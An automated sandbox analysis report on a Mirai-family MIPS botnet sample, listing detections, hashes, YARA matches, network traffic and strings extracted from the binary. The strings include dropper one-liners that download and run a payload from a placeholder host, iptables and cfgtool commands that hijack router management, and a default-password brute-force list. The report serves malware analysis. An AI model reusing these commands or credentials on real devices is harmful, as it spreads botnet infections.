Edit tour

Linux Analysis Report
bin.sh.elf

Overview

General Information

Sample name:bin.sh.elf
Analysis ID:1617584
MD5:0a7bb31b831dcd6251228be823b00222
SHA1:1309604e4199cc1f02340ee18b6b73b6f8ef77e8
SHA256:4f9421f1c2b8a0d29803ac68627ddd9b917130d6b9a5a7adbc8187a8270f8277
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:92
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample is packed with UPX
ELF contains segments with high entropy indicating compressed/encrypted content
Found strings indicative of a multi-platform dropper
Sample contains only a LOAD segment without any section mappings
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1617584
Start date and time:2025-02-18 01:58:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 30s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bin.sh.elf
Detection:MAL
Classification:mal92.troj.evad.linELF@0/0@0/0
Command:/tmp/bin.sh.elf
PID:6242
Exit Code:133
Exit Code Info:
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped
  • system is lnxubuntu20
  • bin.sh.elf (PID: 6242, Parent: 6161, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/bin.sh.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
bin.sh.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    bin.sh.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
      bin.sh.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        bin.sh.elfLinux_Packer_Patched_UPX_62e11c64unknownunknown
        • 0x78:$a: 55 50 58 21 0A 58 0D 89 00 00 00 00 00 00 00 00 00 00 00 00
        bin.sh.elfLinux_Trojan_Mirai_5c62e6b2unknownunknown
        • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
        Click to see the 2 entries
        SourceRuleDescriptionAuthorStrings
        6242.1.00007f4658400000.00007f4658422000.r-x.sdmpLinux_Packer_Patched_UPX_62e11c64unknownunknown
        • 0x78:$a: 55 50 58 21 0A 58 0D 89 00 00 00 00 00 00 00 00 00 00 00 00
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: bin.sh.elfAvira: detected
        Source: bin.sh.elfReversingLabs: Detection: 62%
        Source: bin.sh.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
        Source: bin.sh.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
        Source: bin.sh.elfString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
        Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
        Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
        Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: bin.sh.elfString found in binary or memory: http://%s:%d/bin.sh
        Source: bin.sh.elfString found in binary or memory: http://%s:%d/bin.sh;chmod
        Source: bin.sh.elfString found in binary or memory: http://127.0.0.1
        Source: bin.sh.elfString found in binary or memory: http://127.0.0.1sendcmd
        Source: bin.sh.elfString found in binary or memory: http://HTTP/1.1
        Source: bin.sh.elfString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
        Source: bin.sh.elfString found in binary or memory: http://ipinfo.io/ip
        Source: bin.sh.elfString found in binary or memory: http://upx.sf.net
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

        System Summary

        barindex
        Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Packer_Patched_UPX_62e11c64 Author: unknown
        Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
        Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
        Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
        Source: 6242.1.00007f4658400000.00007f4658422000.r-x.sdmp, type: MEMORYMatched rule: Linux_Packer_Patched_UPX_62e11c64 Author: unknown
        Source: LOAD without section mappingsProgram segment: 0x400000
        Source: Initial sampleString containing 'busybox' found: busybox
        Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
        Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
        Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
        Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
        Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
        Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
        Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
        Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing potential weak password found: admin
        Source: Initial sampleString containing potential weak password found: default
        Source: Initial sampleString containing potential weak password found: support
        Source: Initial sampleString containing potential weak password found: service
        Source: Initial sampleString containing potential weak password found: supervisor
        Source: Initial sampleString containing potential weak password found: guest
        Source: Initial sampleString containing potential weak password found: administrator
        Source: Initial sampleString containing potential weak password found: 123456
        Source: Initial sampleString containing potential weak password found: 54321
        Source: Initial sampleString containing potential weak password found: password
        Source: Initial sampleString containing potential weak password found: 12345
        Source: Initial sampleString containing potential weak password found: admin1234
        Source: Initial samplePotential command found: GET /c HTTP/1.0
        Source: Initial samplePotential command found: GET %s HTTP/1.1
        Source: Initial samplePotential command found: GET /c
        Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
        Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Packer_Patched_UPX_62e11c64 reference_sample = 02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669, os = linux, severity = x86, creation_date = 2021-06-08, scan_context = file, reference = https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/, license = Elastic License v2, threat_name = Linux.Packer.Patched_UPX, fingerprint = 3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d, id = 62e11c64-fc7d-4a0a-9d72-ad53ec3987ff, last_modified = 2021-07-28
        Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
        Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
        Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
        Source: 6242.1.00007f4658400000.00007f4658422000.r-x.sdmp, type: MEMORYMatched rule: Linux_Packer_Patched_UPX_62e11c64 reference_sample = 02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669, os = linux, severity = x86, creation_date = 2021-06-08, scan_context = file, reference = https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/, license = Elastic License v2, threat_name = Linux.Packer.Patched_UPX, fingerprint = 3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d, id = 62e11c64-fc7d-4a0a-9d72-ad53ec3987ff, last_modified = 2021-07-28
        Source: classification engineClassification label: mal92.troj.evad.linELF@0/0@0/0

        Data Obfuscation

        barindex
        Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
        Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
        Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
        Source: bin.sh.elfSubmission file: segment LOAD with 7.8156 entropy (max. 8.0)
        Source: /tmp/bin.sh.elf (PID: 6242)Queries kernel information via 'uname': Jump to behavior
        Source: bin.sh.elf, 6242.1.00007fff8dffd000.00007fff8e01e000.rw-.sdmpBinary or memory string: d<x86_64/usr/bin/qemu-mips/tmp/bin.sh.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/bin.sh.elf
        Source: bin.sh.elf, 6242.1.000055e86f660000.000055e86f6e7000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
        Source: bin.sh.elf, 6242.1.000055e86f660000.000055e86f6e7000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
        Source: bin.sh.elf, 6242.1.00007fff8dffd000.00007fff8e01e000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
        Source: bin.sh.elf, 6242.1.00007fff8dffd000.00007fff8e01e000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: bin.sh.elf, type: SAMPLE

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: bin.sh.elf, type: SAMPLE
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid Accounts1
        Command and Scripting Interpreter
        1
        Scripting
        Path Interception11
        Obfuscated Files or Information
        1
        Brute Force
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617584 Sample: bin.sh.elf Startdate: 18/02/2025 Architecture: LINUX Score: 92 8 109.202.202.202, 80 INIT7CH Switzerland 2->8 10 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->10 12 91.189.91.43, 443 CANONICAL-ASGB United Kingdom 2->12 14 Malicious sample detected (through community Yara rule) 2->14 16 Antivirus / Scanner detection for submitted sample 2->16 18 Multi AV Scanner detection for submitted file 2->18 20 2 other signatures 2->20 6 bin.sh.elf 2->6         started        signatures3 process4
        SourceDetectionScannerLabelLink
        bin.sh.elf62%ReversingLabsLinux.Backdoor.Mirai
        bin.sh.elf100%AviraLINUX/Mirai.bonb
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches

        Download Network PCAP: filteredfull

        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://%s:%d/bin.sh;chmodbin.sh.elffalse
          high
          http://upx.sf.netbin.sh.elffalse
            high
            http://HTTP/1.1bin.sh.elffalse
              high
              http://ipinfo.io/ipbin.sh.elffalse
                high
                http://127.0.0.1bin.sh.elffalse
                  high
                  http://baidu.com/%s/%s/%d/%s/%s/%s/%s)bin.sh.elffalse
                    high
                    http://%s:%d/bin.shbin.sh.elffalse
                      high
                      http://127.0.0.1sendcmdbin.sh.elffalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        109.202.202.202
                        unknownSwitzerland
                        13030INIT7CHfalse
                        91.189.91.43
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        91.189.91.42
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                        • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                        91.189.91.43boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                              boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                na.elfGet hashmaliciousPrometeiBrowse
                                  .i.elfGet hashmaliciousUnknownBrowse
                                    na.elfGet hashmaliciousPrometeiBrowse
                                      na.elfGet hashmaliciousPrometeiBrowse
                                        na.elfGet hashmaliciousPrometeiBrowse
                                          na.elfGet hashmaliciousPrometeiBrowse
                                            91.189.91.42boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                  boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      .i.elfGet hashmaliciousUnknownBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CANONICAL-ASGBboatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 185.125.190.26
                                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                • 91.189.91.42
                                                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                .i.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                CANONICAL-ASGBboatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 185.125.190.26
                                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                • 91.189.91.42
                                                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                .i.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                INIT7CHboatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 109.202.202.202
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 109.202.202.202
                                                                boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                • 109.202.202.202
                                                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 109.202.202.202
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 109.202.202.202
                                                                .i.elfGet hashmaliciousUnknownBrowse
                                                                • 109.202.202.202
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 109.202.202.202
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 109.202.202.202
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 109.202.202.202
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 109.202.202.202
                                                                No context
                                                                No context
                                                                No created / dropped files found
                                                                File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
                                                                Entropy (8bit):6.7946307331930305
                                                                TrID:
                                                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                File name:bin.sh.elf
                                                                File size:245'350 bytes
                                                                MD5:0a7bb31b831dcd6251228be823b00222
                                                                SHA1:1309604e4199cc1f02340ee18b6b73b6f8ef77e8
                                                                SHA256:4f9421f1c2b8a0d29803ac68627ddd9b917130d6b9a5a7adbc8187a8270f8277
                                                                SHA512:3f1c4046808ebc18ea7c943aad3f41fbe411024285072a3fc1ca2cdee63b19f91eb58bea29e041f6b1483c17827fcfb90d4200372b1a5da3a0cdf6d1da4b91bb
                                                                SSDEEP:6144:p3lOYoaja8xzx/0wsxzSiaa77oNsKqqfPqO:p1CG/jsxzXaa/HKqoPqO
                                                                TLSH:D534DF89ED01AF24E9C021BAFF5F074DB7635BBCD2E7B111EA10D715278A69A4F3A014
                                                                File Content Preview:.ELF.....................B.....4.........4. ...(.............@...@...........................C...C......../..........*.*UPX!.X.....................^....|.$..ELF..........@.`....4...0... ...(......<...@......[v......H...`.t..;_...dt.Q.....].M..............

                                                                ELF header

                                                                Class:ELF32
                                                                Data:2's complement, big endian
                                                                Version:1 (current)
                                                                Machine:MIPS R3000
                                                                Version Number:0x1
                                                                Type:EXEC (Executable file)
                                                                OS/ABI:UNIX - System V
                                                                ABI Version:0
                                                                Entry Point Address:0x4206a8
                                                                Flags:0x1007
                                                                ELF Header Size:52
                                                                Program Header Offset:52
                                                                Program Header Size:32
                                                                Number of Program Headers:2
                                                                Section Header Offset:0
                                                                Section Header Size:40
                                                                Number of Section Headers:0
                                                                Header String Table Index:0
                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                LOAD0x00x4000000x4000000x210f20x210f27.81560x5R E0x10000
                                                                LOAD0x00x4300000x4300000x00x92fd80.00000x6RW 0x10000

                                                                Download Network PCAP: filteredfull

                                                                • Total Packets: 7
                                                                • 443 (HTTPS)
                                                                • 80 (HTTP)
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Feb 18, 2025 01:58:58.953445911 CET42836443192.168.2.2391.189.91.43
                                                                Feb 18, 2025 01:58:59.721347094 CET4251680192.168.2.23109.202.202.202
                                                                Feb 18, 2025 01:59:14.312369108 CET43928443192.168.2.2391.189.91.42
                                                                Feb 18, 2025 01:59:24.550040960 CET42836443192.168.2.2391.189.91.43
                                                                Feb 18, 2025 01:59:30.693733931 CET4251680192.168.2.23109.202.202.202
                                                                Feb 18, 2025 01:59:55.266100883 CET43928443192.168.2.2391.189.91.42
                                                                Feb 18, 2025 02:00:15.743333101 CET42836443192.168.2.2391.189.91.43

                                                                System Behavior

                                                                Start time (UTC):00:58:55
                                                                Start date (UTC):18/02/2025
                                                                Path:/tmp/bin.sh.elf
                                                                Arguments:/tmp/bin.sh.elf
                                                                File size:5777432 bytes
                                                                MD5 hash:0083f1f0e77be34ad27f849842bbb00c